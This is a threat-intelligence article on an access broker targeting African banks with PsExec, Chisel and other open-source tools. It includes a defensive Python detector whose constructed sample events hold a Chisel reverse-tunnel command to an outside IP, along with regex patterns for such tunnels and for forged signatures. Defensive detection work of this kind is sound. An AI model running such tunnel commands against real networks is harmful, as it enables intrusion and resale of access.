Cybercriminals are actively targeting African financial institutions via open-source tools.

Cybercriminals are actively targeting African financial institutions using open-source tools to establish footholds and sell network access to other threat actors. Palo Alto Networks Unit 42 tracks this activity as CL-CRI-1014, with attacks observed since July 2023.

Attack Methodology

The threat actor employs a consistent strategy:

1. Initial Access: Gains entry through a method that has not yet been determined, then deploys tools such as PsExec to execute commands on remote machines.
2. Tool Deployment: Uses the following tools:
• PoshC2: Open-source command-and-control framework, used here for reconnaissance.
• Chisel: Tunneling utility, used to bypass firewalls and spread malware across the internal network.
• Classroom Spy: Legitimate remote administration tool repurposed for malicious remote control.
3. Evasion Tactics: Forges the file signatures of legitimate applications so that malicious files pass as benign software.
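The tools named above (PsExec, Chisel) and the forged-signature trick all leave traces in process-creation telemetry. The following is an added example of the kind of detection logic a defender could run over such events; it is not code from the Unit 42 report. The event field names (host, image, parent_image, command_line, product, sha256), the sample events and the "known-good" hash allowlist are all constructed for this example.

```python
import ntpath
import re

# Constructed allowlist of known-good binary hashes (placeholder values, not real
# hashes). In practice this is built from a golden image or a signed-file inventory.
KNOWN_GOOD_SHA256 = {
    "c" * 64: r"C:\Windows\System32\svchost.exe",
}

# Product names that a forged file signature typically imitates. A prefix match is
# deliberately broad; tune it to the vendors your estate actually runs.
IMITATED_PRODUCT = re.compile(r"microsoft|windows", re.IGNORECASE)

# Chisel's client/server invocation with a reverse port-forward ("R:...") or the
# server-side "--reverse" flag, regardless of what the binary was renamed to.
CHISEL_CMDLINE = re.compile(r"\b(?:client|server)\b.*(?:\sR:\S*|--reverse)", re.IGNORECASE)

# Constructed Sysmon-like process-creation events (hypothetical hosts and paths).
SAMPLE_EVENTS = [
    {"host": "branch-pc-07", "image": r"C:\Windows\PSEXESVC.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\PSEXESVC.exe",
     "product": "Sysinternals PsExec", "sha256": "a" * 64},
    {"host": "branch-pc-07", "image": r"C:\Users\Public\svc.exe",
     "parent_image": r"C:\Windows\PSEXESVC.exe",
     "command_line": r"svc.exe client 203.0.113.10:8080 R:socks",
     "product": "Microsoft Update Agent", "sha256": "b" * 64},
    {"host": "teller-03", "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"svchost.exe -k netsvcs",
     "product": "Microsoft Windows Operating System", "sha256": "c" * 64},
    {"host": "teller-03", "image": r"C:\ProgramData\update.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"update.exe",
     "product": "Microsoft Windows Operating System", "sha256": "d" * 64},
]


def _basename(path):
    # ntpath handles Windows separators on any platform.
    return ntpath.basename(path).lower()


def _in_windows_dir(path):
    return path.lower().startswith("c:\\windows\\")


def analyze_event(event, known_good=KNOWN_GOOD_SHA256):
    """Return the reasons (possibly none) an event resembles the tradecraft described above."""
    reasons = []
    image = _basename(event["image"])
    parent = _basename(event["parent_image"])
    cmd = event.get("command_line", "")

    # PsExec drops and starts PSEXESVC.exe on the target; anything it spawns is remote execution.
    if image == "psexesvc.exe":
        reasons.append("PsExec service binary executing (remote command execution)")
    elif parent == "psexesvc.exe":
        reasons.append("process launched via PsExec service")

    if CHISEL_CMDLINE.search(cmd):
        reasons.append("Chisel-style reverse tunnel command line")

    # Forged signature heuristic: claims a Microsoft/Windows product, lives outside
    # C:\Windows, and its hash is not in the known-good inventory.
    if (IMITATED_PRODUCT.search(event.get("product", ""))
            and not _in_windows_dir(event["image"])
            and event.get("sha256") not in known_good):
        reasons.append("Microsoft/Windows product metadata on unknown binary outside C:\\Windows")
    return reasons


def detect(events, known_good=KNOWN_GOOD_SHA256):
    """Flatten per-event reasons into a list of findings."""
    findings = []
    for event in events:
        for reason in analyze_event(event, known_good):
            findings.append({"host": event["host"], "image": event["image"], "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"{finding['host']}: {finding['image']} -> {finding['reason']}")
```

The hash allowlist is what makes the forged-metadata rule useful: version-info strings are trivially copied, so the rule trusts the inventory of actually signed binaries rather than the strings themselves. Expect the PsExec rule to fire on legitimate administrative use as well; correlate it with the originating account and time of day before paging anyone.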

Motivations and Impact

The attackers operate under an Initial Access Broker (IAB) model: the primary goal is to compromise networks and sell access on dark web markets to other criminals. They target financial institutions across Africa, exploiting the inadequate cybersecurity controls identified in World Bank assessments. These attacks align with Interpol’s 2025 findings, in which cybercrime accounts for more than 30% of reported crime in parts of Africa, driven by ransomware, phishing, and BEC scams.

Regional Cybersecurity Challenges

African financial sectors face systemic vulnerabilities. Only 30% of African countries have cyber-incident reporting systems, and the threat landscape is dominated by organized crime groups and nation-state actors targeting payment systems, alongside ransomware and data theft. Some 86% of African countries report poor international cooperation against cybercrime.